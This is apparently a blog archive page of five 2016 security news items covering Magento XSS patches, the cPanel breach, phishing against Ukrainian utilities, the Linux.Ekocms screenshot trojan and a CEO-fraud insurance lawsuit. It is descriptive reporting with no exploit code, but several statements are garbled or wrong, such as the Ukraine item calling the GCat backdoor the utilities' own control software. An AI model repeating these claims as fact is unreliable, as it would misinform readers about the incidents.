Archive for January 30, 2016

Magento releases update for fixing security vulnerabilities

Magento an e-commerce management platform, has released an update for a number of critical XSS vulnerabilities which includes patches for two critical issues.

The stored cross-site scripting (XSS) flaws allow the attackers to hijack Magento-based websites via administrator accounts. Which may result to the theft of sensitive customer data.

The first vulnerability affected almost every version of Magento from CE and below to EE and above. This  vulnerability could be exploited remotely by attackers. For exploiting this bug one needs an an email containing malicious Javascript code  which is sent through the CMS platform.

Magento doesn't check the content of the email properly and executes it in an admin content. After this the malicious code is able to steal an administrator session.

Cybersecurity firm Sucuri says:"The buggy snippet is located inside Magento core libraries, more specifically within the administrator's backend. Unless you're behind a WAF or you have a very heavily modified administration panel, you're at risk."

The second bug was discovered within the comments sections of the Magento CMS.
As Magento does not filter the request properly, JavaScript code gets saved in the Magento database. When admin view the server-side, this code executes and  leads to the session hijacking.

Other than these two critical vulnerabilities Magento also fixes problems including RSS-based information leaks, weaknesses to brute-force attacks, a lack of form protection on the Admin Login page, and many more.

To protect websites from exploitation, apply for the latest patch bundle SUPEE-7405 as soon as possible.

Hack on cPanel exposes customer details

cPanel was hacked this weekend which exposed details of its customers,including their names, contact details, and encrypted passwords.

Though hacking did not affect payment information which was kept on a separate system.

The firm warned its customers with older passwords to change them,though the possibility of its exposure is less.

   “Although current passwords are stored salted and encrypted, we are accelerating our move to stronger password encryption at the same time in order to minimize disruption. In order to safeguard the system, we will force all users with older password encryption to change their passwords,” said the company’s e-mail.

Though the breach is fairly minor but if attackers make use of exposed information, the customers may be badly impacted.

The company has been in control since 1997 and promises its customers to be most reliable company in web hosting industry. 

Phishing attack on Ukrainian electricity utilities systems

Recently Ukrainian electricity utilities systems were exposed to phishing attacks which let to power cut affecting almost 80,000 customers for six hours.

The current Phishing attacks were similar to that of BlackEnergy attacks that happened on 23rd december in the Prykarpattya Oblenergo and Kyiv Oblenergo causing huge Power cut leading to mass outrage.

Ukraine's nation security have doubted Kremlin for the attacks.

For the current phishing attack , computer systems were served with malicious Microsoft XLS files , which attempts to open and execute open source software GCat backdoor, software which is responsible for handling Ukrainian electricity utilities systems.

This technique has been used in other attacks as well. According to Robert Lipovsky, who is ESET threat man confirmed that in the attack Users on the system are urged to download macros, and then those macros downloads executables and run shell commands leading to total crash of software .

Some of the GC at backdoor functionality like making screenshots, keylogging or uploading files, were removed from the source code.

The macros were sent using gmail account, which makes malwares difficult to detect.

Lipovsky said they were not certain of role of Russia or other actor in the attacks.

Many researchers in Ukraine are working on forensics and systems security following BlackEnergy attacks.

New Linux Trojan spies on users by taking screenshots

(pc-google images)
In the last one week, Linux.Ekocms.1 trojan has become the latest threat that targets Linux PCs, soon after ransomware Linux.Encoder and the Linux XOR DDoS malware had showed a large number of issues and have created blotches in Linux's status as impermeable when it comes to malware infections.

According to Russia's top anti-virus company, Dr.Web, this trojan is a part of the spyware family that was specially designed in order to take screenshots of the user's desktop every 30 seconds. In most cases, the recorded screenshot files got saved to the same two folders, but in the absence of the folders, the trojan created its own  folder when needed.

People using Linux PC without an antivirus solution installed can diagnose for Linux.Ekocms themselves by searching the following two folders and seeing if they can find any screengrabs:
- $HOME/$DATA/.mozilla/firefox/profiled
- $HOME/$DATA/.dropbox/DropboxCache

The trojan saves all files in JPEG format with a title consisting of the timestamp of the screenshot. On facing an error while saving the screenshot, the trojan will instead use the BMP format for saving the screengrabs, which are then uploaded to an available remote server. Linux.Ekocms uploads these files to a C&C (command and control) server via a proxy IP at regular intervals. The server's IP address is hard-coded into the trojan's source code thus, all files are sent via an encrypted connection, therein third-party reverse engineers tools will have a tedious job to pick up on the trojan's operations.

The presence of an audio recording feature in its codebase, as claimed by Dr.Web experts remains dysfunctional as it was never active in the trojan's normal operation. The latest version, Linux.Ekocms is a powerful reconnaissance tool, that allows attackers to get a brief overview of the basic tools used on a daily basis by a Linux user and the websites visited.

Cyber Insurer sued after company loses $480K in CEO Fraud

A Texas-based engineering firm, Ameriforge Group Inc. or popularly known as AFGlobal is suing its cyber insurance provider, Federal Insurance Co., a division of insurance giant Chubb Group for refusing to cover a $ 480,000 loss following an email scam that impersonated the firm’s chief executive.

AFGlobal claims of having the papers to prove that scammers impersonating AFGlobal’s CEO convinced the company’s accountant to wire $ 480,000 to Agricultural Bank of China.

According to documents filed with the U.S. District Court in Harris County, Texas, the policy covered up to $3 million, with a $100,000 deductible. The documents indicate that from May 21, 2014 to May 27, 2014, AFGlobal’s director of accounting received a series of emails from someone claiming to be Gean Stalcup, the CEO of AFGlobal.

After the demand was fulfilled, the email sender then asked for an additional $ 18 million.

The firm expects some payout from its insurer for this incident but the insurer expects all this to go away.

CEO Fraud schemes are an increasingly common and costly form of cybercrime. According to the FBI, thieves have stolen nearly $750 million in such scams from more than 7,000 victim companies in the U.S. between October 2013 and August 2015.

The chief financial officer of one of New Zealand’s largest learning institutions had left her job after falling for an email “whaling” scam.

The executive director of finance at Te Wananga o Aotearoa, Bronwyn Koroheke, transferred $US 79,000 ($118,000) to an offshore bank account after receiving an email which appeared to be from her chief executive Jim Mather telling her to send the money which was actually sent from Chinese-based fraudsters running a whaling scam.

In such a scenario, the FBI has urged businesses to adopt two-step or two-factor authentication for email, where available, and/or to establish other communication channels such as telephone calls to verify significant transactions. Businesses are also advised to exercise restraint when publishing information about employee activities on their Web sites or through social media.

Source: KrebsOnSecurity